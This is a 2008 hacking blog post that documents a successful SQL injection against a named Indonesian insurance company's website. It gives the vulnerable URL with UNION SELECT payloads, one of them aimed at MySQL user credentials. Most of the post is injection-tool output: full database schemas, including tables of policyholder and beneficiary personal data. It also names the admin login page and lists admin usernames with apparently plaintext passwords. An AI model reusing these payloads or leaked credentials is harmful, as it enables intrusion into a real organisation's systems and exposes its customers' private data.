viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Wednesday, October 15, 2008

[SQLi] http://www.jiwasraya.co.id

2:30 PM Posted by viperfx07 No comments


Admin login page --> http://www.jiwasraya.co.id/admin/
Admin usr:pwd --> admin:ari1007 (see else in dump)
Dump:
[+] URL:http://www.jiwasraya.co.id/detailberita.php?id=233+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 09:51:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: jiwasraya1
User: root@localhost
Version: 5.0.18-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.jiwasraya.co.id/detailberita.php?id=233+AND+1=2+UNION+SELECT+concat(user,0x3a,password)+FROM+mysql.user--

[+] Do we have Access to Load_File: No

[-] [09:51:14]
[-] Total URL Requests 3
[-] Done

[Database]: aims
[Table: Columns]
[0]download: id,filename,description
[1]example: id,titel,url
[2]menu: menu_id,nama_menu,menu_id_induk,link,no_urut
[3]role: role_id,nama_role
[4]role_menu: role_id,menu_id
[5]user: userid,password,username,email,address,kota,phone,zipcode,birthdate,sex
[6]user_role: userid,role_id

[Database]: casc
[Table: Columns]
[0]menu: menu_id,text_id,text_en,main_menu_id,link,image,level,status
[1]menucontent: menu_id,title,intro,content,status,record_date,user_record,user_update,update_date,image,pic_position,link,lang_id
[2]organisasi: kd_organisasi,nama_organisasi
[3]pegawai: nip,nama,jabatan,unitkerja,kdkantor,kdorganisasi,email
[4]userid: user_id,password,name,birthdate,sex,email,address,city,province_id,zipcode,phone,fax,url,user_level,added_by,added_date,status,kd_jenis,confirmid,nopertanggungan
[5]vk2: no_polis,pemegang_polis,no_sertifikat,nama,alamat,kota,propinsi,telp,hp,no_serial,tempat_lahir,tgl_lahir,jenisid,nomorid,ua,premi,idpremi,tgl_mulas,tgl_exp,ahliwaris_1,hubungan_1,ahliwaris_2,hubungan_2,ahliwaris_3,hubungan_3,id,vkidpri,vkid,serialno,tglaplikasi,regid,tgl_premi_lunas,tgl_rekam

[Database]: codextra_db
[Table: Columns]
[0]openwirx: ID,Serial,LanMAC,WirMAC,IP,Location,DataNo,Station,Switch,Port,Info

[Database]: jiwasraya
[Table: Columns]
[0]admin: id,level,username,password,email
[1]agen: noagen,nama,user_id,sk_agen,no_ijin,kdkantor,email,phone,alamat,status
[2]article: art_id,cat_id,art_date,art_title_id,art_title_en,art_intro_id,art_intro_en,art_content_id,art_content_en,art_pic,author,source,location,user_record,user_update,user_approve,date_update,date_approve,status
[3]articlecat: cat_id,cat_title_id,cat_title_en,cat_icon,cat_thumb,cat_desc,status
[4]award: id,pic,intro_id,intro_en
[5]banner: id,nm_banner,file
[6]jenis_user: kd_jenis,nama_jenis,status
[7]kantor: kdkantor,namakantor,kdkantorinduk,alamat,kota,kdpropinsi,phone,fax,email,kodepos,url
[8]kode_file: kd_file,nama,keterangan
[9]kode_jabatan: kd_jabatan,jabatan_id,jabatan_en
[10]kode_organisasi: kd_organisasi,organisasi_id,organisasi_en,keterangan,rowid
[11]kurs: kdvaluta,namavaluta,simbol,tglberlaku,status,nilai
[12]layanan: id,nama,pekerjaan,email,alamat,kodepos,kota,telprumah,telpselular,telpkantor,status,pesan,ticket_id,answer,admin_id
[13]level_user: kd_level,nama_level
[14]log: time,ipaddress,userid,taskname,note
[15]menu: rowid,menu_id,text_id,text_en,main_menu_id,link,image,level,status
[16]menucontent: menu_id,title,intro,content,status,record_date,user_record,user_update,update_date,image,pic_position,link,lang_id
[17]milis: email,name,username,password,ip,time,membercode,confirm,confirmid
[18]newmenu: id,seq,parent,title_id,title_en,link_id,link_en,level,status,mm,min
[19]newsletter: art_id,art_title,art_content,art_pic,author,source,location,user_record,user_update,user_approve,date_record,date_update,date_approve,pic_position,lang_id,status
[20]p_admin: ID,username,password
[21]p_choices: ID,answer,votes
[22]p_ip: ID,IP
[23]p_question: ID,question
[24]pejabat: pejabat_id,nama,jabatan,photo,kdkantor,keterangan,kdmanager,kdorganisasi,user_update,tgl_update
[25]pengumuman: id,cat_id,date,title_id,title_en,intro_id,intro_en,content_id,content_en,pic,author,source,location,status
[26]pengumuman_cat: id,nama,nama_en
[27]poll_jawab: id,nama,hits,poll_id
[28]poll_tanya: id,tanggal,nama
[29]produk: kdproduk,pr_cat_id,pr_sub_id,pr_kel_id,namaproduk,keterangan,en_keterangan,profile,en_profile,icon,pic,status,tgl_rekam
[30]produk_cat: id,nama_id,nama_en
[31]produk_kel: sub_id,id,nama_id,nama_en
[32]produk_sub: cat_id,id,nama_id,nama_en
[33]propinsi: kdpropinsi,namapropinsi
[34]spaj_beneficiary: spaj_id,beneficiary_id,nama,tgl_lahir,hubungan,jenis_id,nomor_id,pekerjaan,tinggi_badan,berat_badan,jenis_kelamin,perokok,session_id,status
[35]spaj_ketentuanpolis: spaj_id,kdproduk,valuta,carabayar,cara_pelunasan,mulas,jua,masa_asuransi,masa_premi,premi,jaminan_lengkap,jua_tambahan,premi_tambahan,session_id,status
[36]spaj_pmg_polis: spaj_id,nama,jenis_id,no_id,warga_negara,nama_ibu,tgl_lahir,jenis_kelamin,perokok,pekerjaan,jabatan,valuta_penghasilan,penghasilan,tinggi_badan,berat_badan,alamat_rumah,rt_rw,kodepos,kdpropinsi,kdnegara,kotamadya,kd_wilayah,telepon,hp,status,session_id,email
[37]spaj_polis_exist: spaj_id,nopolis,jua,premi,prsh_asuransi,status_polis,session_id,status
[38]spaj_tertanggung: spaj_id,nama,jenis_id,no_id,warga_negara,nama_ibu,tgl_lahir,jenis_kelamin,perokok,pekerjaan,jabatan,valuta_penghasilan,penghasilan,tinggi_badan,berat_badan,alamat_rumah,rt_rw,kodepos,kdpropinsi,kdnegara,kotamadya,kd_wilayah,telepon,hp,status,session_id,email
[39]static: cat_id,id,title_id,title_en,content_id,content_en
[40]static_cat: id,nama
[41]upload: id,nama,keterangan,time,user,size
[42]userid: user_id,password,name,birthdate,sex,email,address,city,province_id,zipcode,phone,fax,url,user_level,added_by,added_date,status,kd_jenis,confirmid,nopertanggungan

[Database]: jiwasraya1
[Table: Columns]
[0]admin: id,level,username,password,email
[1]article: art_id,cat_id,art_date,art_title_id,art_title_en,art_intro_id,art_intro_en,art_content_id,art_content_en,art_pic,author,source,location,user_record,user_update,user_approve,date_update,date_approve,status
[2]articlecat: cat_id,cat_title_id,cat_title_en,cat_icon,cat_thumb,cat_desc,status
[3]award: id,pic,intro_id,intro_en,tgl
[4]banner: id,posisi,link,file
[5]dplk_pin: no_peserta,kode_group,no_pin,email
[6]email_us: id,email
[7]intro: id,title_id,intro_id,title_en,intro_en
[8]intro_flash: tgl_dari,tgl_sampai,file_id,file_en
[9]j_quiz: id,id_soal,jawaban,status
[10]kantor: kdkantor,namakantor,kdkantorinduk,alamat,kota,kdpropinsi,phone,fax,email,kodepos,url
[11]layanan: id,nama,status,alamat,kodepos,kota,tlprumah,tlpkantor,hp,pekerjaan,email,pesan,tgl,kode
[12]magazine: id,bulan,tahun,judul,deskripsi,file,pic
[13]mail_service: id,email
[14]memberarea: id,link,nama_id,nama_en,desc_id,desc_en
[15]newmenu: id,seq,parent,title_id,title_en,link_id,link_en,level,status,mm,min
[16]p_admin: ID,username,password
[17]p_choices: ID,answer,votes
[18]p_ip: ID,IP
[19]p_question: ID,question
[20]pengumuman: id,cat_id,date,title_id,title_en,intro_id,intro_en,content_id,content_en,pic,author,source,location,status
[21]pengumuman_cat: id,nama,nama_en
[22]produk: kdproduk,kdsimulasi,pr_cat_id,pr_sub_id,pr_kel_id,namaproduk,keterangan,en_keterangan,profile,en_profile,icon,pic,status,tgl_rekam
[23]produk_cat: id,nama_id,nama_en
[24]produk_kel: sub_id,id,nama_id,nama_en
[25]produk_sub: cat_id,id,nama_id,nama_en
[26]quiz: id,soal
[27]static: cat_id,id,title_id,title_en,content_id,content_en
[28]static_cat: id,nama
[29]upload: id,kategori,judul,nama,keterangan,time,user,size
[30]user_quiz: id,nama,ktp,alamat,telp,email,jwb_1,jwb_2,jwb_3,status,tgl
[31]user_quiz_old: id,nama,ktp,alamat,telp,email,jwb_1,jwb_2,jwb_3,status,tgl
[32]userid: user_id,password,name,birthdate,sex,email,address,city,province_id,zipcode,phone,fax,url,user_level,added_by,added_date,status,kd_jenis,confirmid,nopertanggungan,nopertanggungan2,nopertanggungan3,nopertanggungan4,nopertanggungan5
[33]vk: no_polis,pemegang_polis,no_sertifikat,nama,alamat,kota,propinsi,telp,hp,no_serial,tempat_lahir,tgl_lahir,jenisid,nomorid,ua,premi,idpremi,tgl_mulas,tgl_exp,ahliwaris_1,hubungan_1,ahliwaris_2,hubungan_2,ahliwaris_3,hubungan_3,id,vkidpri,vkid,serialno,tglaplikasi,regid,tgl_premi_lunas,tgl_rekam

[Database]: mysql
[Table: Columns]
[0]columns_priv: Host,Db,User,Table_name,Column_name,Timestamp,Column_priv
[1]db: Host,Db,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
[2]func: name,ret,dl,type
[3]help_category: help_category_id,name,parent_category_id,url
[4]help_keyword: help_keyword_id,name
[5]help_relation: help_topic_id,help_keyword_id
[6]help_topic: help_topic_id,name,help_category_id,description,example,url
[7]host: Host,Db,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
[8]proc: db,name,type,specific_name,language,sql_data_access,is_deterministic,security_type,param_list,returns,body,definer,created,modified,sql_mode,comment
[9]procs_priv: Host,Db,User,Routine_name,Routine_type,Grantor,Proc_priv,Timestamp
[10]tables_priv: Host,Db,User,Table_name,Grantor,Timestamp,Table_priv,Column_priv
[11]time_zone: Time_zone_id,Use_leap_seconds
[12]time_zone_leap_second: Transition_time,Correction
[13]time_zone_name: Name,Time_zone_id
[14]time_zone_transition: Time_zone_id,Transition_time,Transition_type_id
[15]time_zone_transition_type: Time_zone_id,Transition_type_id,Offset,Is_DST,Abbreviation
[16]user: Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections

[Database]: nuke
[Table: Columns]
[0]nuke_authors: aid,name,url,email,pwd,counter,radminsuper,admlanguage
[1]nuke_autonews: anid,catid,aid,title,time,hometext,bodytext,topic,informant,notes,ihome,alanguage,acomm,associated
[2]nuke_banned_ip: id,ip_address,reason,date
[3]nuke_banner: bid,cid,name,imptotal,impmade,clicks,imageurl,clickurl,alttext,date,dateend,position,active,ad_class,ad_code,ad_width,ad_height
[4]nuke_banner_clients: cid,name,contact,email,login,passwd,extrainfo
[5]nuke_banner_plans: pid,active,name,description,delivery,delivery_type,price,buy_links
[6]nuke_banner_positions: apid,position_number,position_name
[7]nuke_banner_terms: terms_body,country
[8]nuke_bbauth_access: group_id,forum_id,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments,auth_mod
[9]nuke_bbbanlist: ban_id,ban_userid,ban_ip,ban_email,ban_time,ban_expire_time,ban_by_userid,ban_priv_reason,ban_pub_reason_mode,ban_pub_reason
[10]nuke_bbcategories: cat_id,cat_title,cat_order
[11]nuke_bbconfig: config_name,config_value
[12]nuke_bbdisallow: disallow_id,disallow_username
[13]nuke_bbforum_prune: prune_id,forum_id,prune_days,prune_freq
[14]nuke_bbforums: forum_id,cat_id,forum_name,forum_desc,forum_status,forum_order,forum_posts,forum_topics,forum_last_post_id,prune_next,prune_enable,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments
[15]nuke_bbgroups: group_id,group_type,group_name,group_description,group_moderator,group_single_user
[16]nuke_bbposts: post_id,topic_id,forum_id,poster_id,post_time,poster_ip,post_username,enable_bbcode,enable_html,enable_smilies,enable_sig,post_edit_time,post_edit_count
[17]nuke_bbposts_text: post_id,bbcode_uid,post_subject,post_text
[18]nuke_bbprivmsgs: privmsgs_id,privmsgs_type,privmsgs_subject,privmsgs_from_userid,privmsgs_to_userid,privmsgs_date,privmsgs_ip,privmsgs_enable_bbcode,privmsgs_enable_html,privmsgs_enable_smilies,privmsgs_attach_sig
[19]nuke_bbprivmsgs_text: privmsgs_text_id,privmsgs_bbcode_uid,privmsgs_text
[20]nuke_bbranks: rank_id,rank_title,rank_min,rank_max,rank_special,rank_image
[21]nuke_bbsearch_results: search_id,session_id,search_array
[22]nuke_bbsearch_wordlist: word_text,word_id,word_common
[23]nuke_bbsearch_wordmatch: post_id,word_id,title_match
[24]nuke_bbsessions: session_id,session_user_id,session_start,session_time,session_ip,session_page,session_logged_in,session_admin
[25]nuke_bbsmilies: smilies_id,code,smile_url,emoticon
[26]nuke_bbthemes: themes_id,template_name,style_name,head_stylesheet,body_background,body_bgcolor,body_text,body_link,body_vlink,body_alink,body_hlink,tr_color1,tr_color2,tr_color3,tr_class1,tr_class2,tr_class3,th_color1,th_color2,th_color3,th_class1,th_class2,th_class3,td_color1,td_color2,td_color3,td_class1,td_class2,td_class3,fontface1,fontface2,fontface3,fontsize1,fontsize2,fontsize3,fontcolor1,fontcolor2,fontcolor3,span_class1,span_class2,span_class3,img_size_poll,img_size_privmsg
[27]nuke_bbthemes_name: themes_id,tr_color1_name,tr_color2_name,tr_color3_name,tr_class1_name,tr_class2_name,tr_class3_name,th_color1_name,th_color2_name,th_color3_name,th_class1_name,th_class2_name,th_class3_name,td_color1_name,td_color2_name,td_color3_name,td_class1_name,td_class2_name,td_class3_name,fontface1_name,fontface2_name,fontface3_name,fontsize1_name,fontsize2_name,fontsize3_name,fontcolor1_name,fontcolor2_name,fontcolor3_name,span_class1_name,span_class2_name,span_class3_name
[28]nuke_bbtopics: topic_id,forum_id,topic_title,topic_poster,topic_time,topic_views,topic_replies,topic_status,topic_vote,topic_type,topic_last_post_id,topic_first_post_id,topic_moved_id
[29]nuke_bbtopics_watch: topic_id,user_id,notify_status
[30]nuke_bbuser_group: group_id,user_id,user_pending
[31]nuke_bbvote_desc: vote_id,topic_id,vote_text,vote_start,vote_length
[32]nuke_bbvote_results: vote_id,vote_option_id,vote_option_text,vote_result
[33]nuke_bbvote_voters: vote_id,vote_user_id,vote_user_ip
[34]nuke_bbwords: word_id,word,replacement
[35]nuke_blocks: bid,bkey,title,content,url,bposition,weight,active,refresh,time,blanguage,blockfile,view,expire,action,subscription
[36]nuke_cities: id,local_id,city,cc,country
[37]nuke_comments: tid,pid,sid,date,name,email,url,host_name,subject,comment,score,reason,last_moderation_ip
[38]nuke_comments_moderated: tid,pid,sid,date,name,email,url,host_name,subject,comment,score,reason,last_moderation_ip
[39]nuke_config: sitename,nukeurl,site_logo,slogan,startdate,adminmail,anonpost,Default_Theme,foot1,foot2,foot3,commentlimit,anonymous,minpass,pollcomm,articlecomm,broadcast_msg,my_headlines,top,storyhome,user_news,oldnum,ultramode,banners,backend_title,backend_language,language,locale,multilingual,useflags,notify,notify_email,notify_subject,notify_message,notify_from,footermsgtxt,email_send,attachmentdir,attachments,attachments_view,download_dir,defaultpopserver,singleaccount,singleaccountname,numaccounts,imgpath,filter_forward,moderate,admingraphic,httpref,httprefmax,CensorMode,CensorReplace,copyright,Version_Num
[40]nuke_confirm: confirm_id,session_id,code
[41]nuke_contactbook: uid,contactid,firstname,lastname,email,company,homeaddress,city,homephone,workphone,homepage,IM,events,reminders,notes
[42]nuke_counter: type,var,count
[43]nuke_downloads_categories: cid,title,cdescription,parentid
[44]nuke_downloads_downloads: lid,cid,sid,title,url,description,date,name,email,hits,submitter,downloadratingsummary,totalvotes,totalcomments,filesize,version,homepage
[45]nuke_downloads_editorials: downloadid,adminid,editorialtimestamp,editorialtext,editorialtitle
[46]nuke_downloads_modrequest: requestid,lid,cid,sid,title,url,description,modifysubmitter,brokendownload,name,email,filesize,version,homepage
[47]nuke_downloads_newdownload: lid,cid,sid,title,url,description,name,email,submitter,filesize,version,homepage
[48]nuke_downloads_votedata: ratingdbid,ratinglid,ratinguser,rating,ratinghostname,ratingcomments,ratingtimestamp
[49]nuke_encyclopedia: eid,title,description,elanguage,active
[50]nuke_encyclopedia_text: tid,eid,title,text,counter
[51]nuke_ephem: eid,did,mid,yid,content,elanguage
[52]nuke_faqanswer: id,id_cat,question,answer
[53]nuke_faqcategories: id_cat,categories,flanguage
[54]nuke_groups: id,name,description,points
[55]nuke_groups_points: id,points
[56]nuke_headlines: hid,sitename,headlinesurl
[57]nuke_journal: jid,aid,title,bodytext,mood,pdate,ptime,status,mtime,mdate
[58]nuke_journal_comments: cid,rid,aid,comment,pdate,ptime
[59]nuke_journal_stats: id,joid,nop,ldp,ltp,micro
[60]nuke_links_categories: cid,title,cdescription,parentid
[61]nuke_links_editorials: linkid,adminid,editorialtimestamp,editorialtext,editorialtitle
[62]nuke_links_links: lid,cid,sid,title,url,description,date,name,email,hits,submitter,linkratingsummary,totalvotes,totalcomments
[63]nuke_links_modrequest: requestid,lid,cid,sid,title,url,description,modifysubmitter,brokenlink
[64]nuke_links_newlink: lid,cid,sid,title,url,description,name,email,submitter
[65]nuke_links_votedata: ratingdbid,ratinglid,ratinguser,rating,ratinghostname,ratingcomments,ratingtimestamp
[66]nuke_main: main_module
[67]nuke_message: mid,title,content,date,expire,active,view,mlanguage
[68]nuke_modules: mid,title,custom_title,active,view,inmenu,mod_group,admins
[69]nuke_pages: pid,cid,title,subtitle,active,page_header,text,page_footer,signature,date,counter,clanguage
[70]nuke_pages_categories: cid,title,description
[71]nuke_poll_check: ip,time,pollID
[72]nuke_poll_data: pollID,optionText,optionCount,voteID
[73]nuke_poll_desc: pollID,pollTitle,timeStamp,voters,planguage,artid,comments
[74]nuke_pollcomments: tid,pid,pollID,date,name,email,url,host_name,subject,comment,score,reason,last_moderation_ip
[75]nuke_pollcomments_moderated: tid,pid,pollID,date,name,email,url,host_name,subject,comment,score,reason,last_moderation_ip
[76]nuke_popsettings: id,uid,account,popserver,port,uname,passwd,numshow,deletefromserver,refresh,timeout
[77]nuke_priv_msgs: msg_id,msg_image,subject,from_userid,to_userid,msg_time,msg_text,read_msg
[78]nuke_public_messages: mid,content,date,who
[79]nuke_queue: qid,uid,uname,subject,story,storyext,timestamp,topic,alanguage
[80]nuke_quotes: qid,quote
[81]nuke_referer: rid,url
[82]nuke_related: rid,tid,name,url
[83]nuke_reviews: id,date,title,text,reviewer,email,score,cover,url,url_title,hits,rlanguage
[84]nuke_reviews_add: id,date,title,text,reviewer,email,score,url,url_title,rlanguage
[85]nuke_reviews_comments: cid,rid,userid,date,comments,score
[86]nuke_reviews_comments_moderated: cid,rid,userid,date,comments,score
[87]nuke_reviews_main: title,description
[88]nuke_session: uname,time,host_addr,guest
[89]nuke_stats_date: year,month,date,hits
[90]nuke_stats_hour: year,month,date,hour,hits
[91]nuke_stats_month: year,month,hits
[92]nuke_stats_year: year,hits
[93]nuke_stories: sid,catid,aid,title,time,hometext,bodytext,comments,counter,topic,informant,notes,ihome,alanguage,acomm,haspoll,pollID,score,ratings,rating_ip,associated
[94]nuke_stories_cat: catid,title,counter
[95]nuke_subscriptions: id,userid,subscription_expire
[96]nuke_topics: topicid,topicname,topicimage,topictext,counter
[97]nuke_users: user_id,name,username,user_email,femail,user_website,user_avatar,user_regdate,user_icq,user_occ,user_from,user_interests,user_sig,user_viewemail,user_theme,user_aim,user_yim,user_msnm,user_password,storynum,umode,uorder,thold,noscore,bio,ublockon,ublock,theme,commentmax,counter,newsletter,user_posts,user_attachsig,user_rank,user_level,broadcast,popmeson,user_active,user_session_time,user_session_page,user_lastvisit,user_timezone,user_style,user_lang,user_dateformat,user_new_privmsg,user_unread_privmsg,user_last_privmsg,user_emailtime,user_allowhtml,user_allowbbcode,user_allowsmile,user_allowavatar,user_allow_pm,user_allow_viewonline,user_notify,user_notify_pm,user_popup_pm,user_avatar_type,user_sig_bbcode_uid,user_actkey,user_newpasswd,points,last_ip,karma
[98]nuke_users_temp: user_id,username,user_email,user_password,user_regdate,check_num,time
[99]nuke_users_verify: uv_id,username,user_question,user_answer

[-] [10:23:30]
[-] Total URL Requests 1736
[-] Done


[+] URL:http://www.jiwasraya.co.id/detailberita.php?id=233+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 10:24:08
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: jiwasraya1
User: root@localhost
Version: 5.0.18-log
[+] Dumping data from database "jiwasraya1" Table "admin"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 5

[0] admin:ari1007:
[1] budi:ari1007:
[2] valent:ari1007:
[3] humas:humas:
[4] fonny:nonaktif:

[-] [10:24:50]
[-] Total URL Requests 9
[-] Done

0 comments:

Post a Comment